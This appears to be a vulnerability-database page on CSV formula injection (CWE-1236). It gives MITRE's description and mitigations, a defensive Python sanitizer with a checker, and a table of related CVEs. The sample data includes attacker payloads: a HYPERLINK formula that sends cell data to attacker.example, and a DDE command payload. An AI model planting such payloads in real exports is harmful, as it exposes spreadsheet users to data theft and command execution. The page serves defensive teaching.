
CWE-1236 vulnerability list (132)

Summary of the 132 CVE entries associated with weakness class CWE-1236, with AI-generated Chinese analysis.

CWE-1236 covers CSV injection (also called formula injection): a program writes user-controlled input into a CSV file without neutralizing the characters that spreadsheet software treats as the start of a formula. An attacker stores a field that begins with a formula trigger such as '=', '+', '-', '@' or a tab character; when a victim opens the exported file in a spreadsheet application, that field is parsed as a formula rather than as text. Depending on the spreadsheet product and its settings, the formula can exfiltrate data (for example through HYPERLINK or external references), execute commands on the victim's machine through legacy features such as DDE, or tamper with data and system configuration; note that current versions of Excel prompt the user before enabling such content. Developers defend against this by escaping or neutralizing the trigger characters, validating input, or exporting in a format that spreadsheet software does not interpret as formulas.

MITRE CWE official description
CWE-1236: Improper Neutralization of Formula Elements in a CSV File. The product saves user-provided information into a Comma-Separated Value (CSV) file, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as a command when the file is opened by a spreadsheet product.
Common Consequences (1)
Scope: Confidentiality. Impact: Read Application Data; Execute Unauthorized Code or Commands.
Attackers can populate data fields which, when saved to a CSV file, may attempt information exfiltration or other malicious activity when automatically executed by the spreadsheet software. Note that current versions of Excel warn users of untrusted content.
Potential Mitigations (3)
Phase: Implementation. When generating CSV output, ensure that formula-sensitive metacharacters are effectively escaped or removed from all data before storage in the resultant CSV. Risky characters include '=' (equal), '+' (plus), '-' (minus), and '@' (at).
Effectiveness: Moderate
Phase: Implementation. If a field starts with a formula character, prepend it with a ' (single apostrophe), which prevents Excel from executing the formula. The apostrophe only neutralizes the formula trigger: fields should still be double-quoted with embedded quotes doubled (RFC 4180) so that a value cannot break out of its cell into extra columns or rows, and some spreadsheet applications display the apostrophe as part of the cell text.
Effectiveness: Moderate
Phase: Architecture and Design. Certain implementations of spreadsheet software might disallow formulas from executing if the file is untrusted, or if the file is not authored by the current user.
Effectiveness: Limited
Demonstrative Examples (1)
Hyperlinks or other commands can be executed when a cell begins with the formula identifier, '='.
Attack (Other): =HYPERLINK(link_location, [friendly_name])
Good (Other): HYPERLINK(link_location, [friendly_name])
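The following Python is an added example, not code from MITRE or from any product listed on this page. It implements the escaping mitigation from the list above (apostrophe prefix plus RFC 4180 quoting) for a CSV export and then parses the result back to check that no cell would be evaluated as a formula, covering the HYPERLINK case from the demonstrative example. The field names, sample rows and attacker payloads are constructed for illustration; the payload shapes follow the publicly documented HYPERLINK and DDE ones.

```python
import csv
import io
import re

# Characters that make spreadsheet software treat a cell as a formula.
# '=', '+', '-' and '@' are the set named in the CWE-1236 mitigation;
# tab and carriage return are included as well because some importers
# also treat them as formula triggers (over-neutralizing is harmless).
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")

# A plain signed number such as "-12.50" is legitimate data and must not
# be turned into text, so it is exempted from neutralization.
_PLAIN_NUMBER = re.compile(r"^-?\d+(\.\d+)?$")


def neutralize_field(value) -> str:
    """Return `value` in a form a spreadsheet will show as literal text.

    Fields whose first non-space character is a formula trigger get a
    leading apostrophe, the mitigation described for CWE-1236. Leading
    spaces are looked past so that an importer which trims whitespace
    still sees the apostrophe first. None becomes an empty cell.
    """
    text = "" if value is None else str(value)
    if _PLAIN_NUMBER.match(text):
        return text
    if text.lstrip(" ").startswith(FORMULA_TRIGGERS):
        return "'" + text
    return text


def to_csv(rows, fieldnames, neutralize=True) -> str:
    """Serialize dict rows to RFC 4180-style CSV text.

    Every cell is double-quoted and embedded quotes are doubled, so a
    value cannot inject extra columns or rows. neutralize=False
    reproduces the vulnerable behaviour: user input written verbatim.
    """
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\r\n")
    writer.writerow(fieldnames)
    for row in rows:
        cells = [row.get(name, "") for name in fieldnames]
        if neutralize:
            cells = [neutralize_field(cell) for cell in cells]
        writer.writerow(cells)
    return buf.getvalue()


def formula_cells(csv_text: str) -> list:
    """Parse CSV text and return every cell a spreadsheet would evaluate
    as a formula: a post-generation check for an export pipeline."""
    hits = []
    for row in csv.reader(io.StringIO(csv_text)):
        for cell in row:
            if cell.startswith(FORMULA_TRIGGERS) and not _PLAIN_NUMBER.match(cell):
                hits.append(cell)
    return hits


# Constructed sample data (hypothetical field names and users): two of the
# display_name values are attacker payloads in the shape of the publicly
# documented HYPERLINK and DDE ones.
FIELDS = ["username", "display_name", "balance"]
SAMPLE_ROWS = [
    {"username": "alice", "display_name": "Alice", "balance": "-12.50"},
    {"username": "mallory",
     "display_name": '=HYPERLINK("https://attacker.example/?"&A1,"open")',
     "balance": "+1"},
    {"username": "eve",
     "display_name": "@SUM(1+1)*cmd|' /C calc'!A0",
     "balance": "0"},
]


if __name__ == "__main__":
    vulnerable = to_csv(SAMPLE_ROWS, FIELDS, neutralize=False)
    hardened = to_csv(SAMPLE_ROWS, FIELDS)
    print("formula cells in vulnerable export:", formula_cells(vulnerable))
    print("formula cells in hardened export:", formula_cells(hardened))
    print(hardened)
```

Running the script reports three formula cells in the vulnerable export (the HYPERLINK payload, the "+1" balance and the DDE-style payload) and none in the hardened one. The "+1" case shows a side effect of the apostrophe approach: a column that is meant to be numeric is better validated and converted at the schema level before export, so that only free-text columns reach the neutralizer.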
CVE ID | Title | Product | CVSS | Risk | Published
CVE-2025-8767 | WordPress plugin AnWP Football Leagues security vulnerability | AnWP Football Leagues | 4.8 | Medium | 2025-08-12
CVE-2025-8808 | tianti security vulnerability | tianti (天梯) | 4.3 | Medium | 2025-08-10
CVE-2025-54752 | Alfasado PowerCMS security vulnerability | PowerCMS | 6.5 | Medium | 2025-07-31
CVE-2025-6838 | WordPress plugin Broken Link Notifier security vulnerability | Broken Link Notifier | 4.1 | Medium | 2025-07-11
CVE-2025-7061 | Intelbras InControl security vulnerability | InControl | 2.7 | Low | 2025-07-04
CVE-2025-1421 | Inedo ProGet security vulnerability | Proget | 6.5 (AI) | Medium (AI) | 2025-05-21
CVE-2025-4546 | MaxKB security vulnerability | MaxKB | 4.7 | Medium | 2025-05-11
CVE-2024-55532 | Apache Ranger security vulnerability | Apache Ranger | 9.8 | - | 2025-03-03
CVE-2025-1836 | Incorta security vulnerability | Incorta | 4.3 | Medium | 2025-03-02
CVE-2024-45084 | IBM Cognos Controller code issue vulnerability | Cognos Controller | 8.0 | High | 2025-02-19
CVE-2024-47572 | Fortinet FortiSOAR security vulnerability | FortiSOAR | 8.3 | Critical | 2025-01-14
CVE-2024-22063 | ZTE ZENIC ONE R58 security vulnerability | ZENIC ONE R58 | 7.6 | High | 2024-12-30
CVE-2024-9102 | phpLDAPadmin security vulnerability | phpLDAPadmin | 8.8 | - | 2024-12-19
CVE-2024-53260 | Autolab security vulnerability | Autolab | 6.8 | Medium | 2024-11-27
CVE-2021-38963 | IBM Aspera Console security vulnerability | Aspera Console | 8.0 | High | 2024-09-24
CVE-2024-3232 | Tenable Identity Exposure security vulnerability | Tenable Identity Exposure | 7.6 | High | 2024-07-16
CVE-2024-27785 | Fortinet FortiAIOps security vulnerability | FortiAIOps | 5.1 | Medium | 2024-07-09
CVE-2023-5527 | WordPress plugin Business Directory security vulnerability | Business Directory Plugin – Easy Listing Directories for WordPress | 7.4 | High | 2024-06-18
CVE-2023-5424 | WordPress plugin WS Form LITE security vulnerability | WS Form LITE – Drag & Drop Contact Form Builder | 4.7 | Medium | 2024-06-07
CVE-2024-28764 | IBM WebSphere Automation security vulnerability | WebSphere Automation | 6.5 | Medium | 2024-05-01
CVE-2023-48709 | iTop security vulnerability | iTop | 8.0 | High | 2024-04-15
CVE-2024-3214 | WordPress Plugin Relevanssi security vulnerability | Relevanssi Premium | 5.8 | Medium | 2024-04-09
CVE-2024-25007 | Ericsson Network Manager security vulnerability | Ericsson Network Manager | 7.1 | High | 2024-04-04
CVE-2023-47534 | Fortinet FortiClientEMS security vulnerability | FortiClientEMS | 8.7 | Critical | 2024-03-12
CVE-2024-28111 | Thinkst Canarytokens security vulnerability | canarytokens | 6.5 | Medium | 2024-03-06
CVE-2023-35899 | IBM Cloud Pak for Automation security vulnerability | Cloud Pak for Automation | 7.0 | High | 2024-03-05
CVE-2023-45597 | AiLux imx6 security vulnerability | imx6 bundle | 5.9 | Medium | 2024-03-05
CVE-2023-42004 | IBM Security Guardium security vulnerability | Security Guardium | 8.0 | High | 2023-11-28
CVE-2023-41798 | WordPress Plugin Directorist security vulnerability | Directorist – WordPress Business Directory Plugin with Classified Ads Listings | 5.1 | Medium | 2023-11-07
CVE-2022-41616 | WordPress Plugin export-users-data-csv security vulnerability | Export Users Data CSV | 7.6 | High | 2023-11-07

CVSS is the base score shown on the page; "(AI)" marks a value the page tags as AI-generated rather than taken from the advisory; "-" means no risk level is given.

CWE-1236 is a common weakness class; this platform indexes 132 CVE entries associated with it.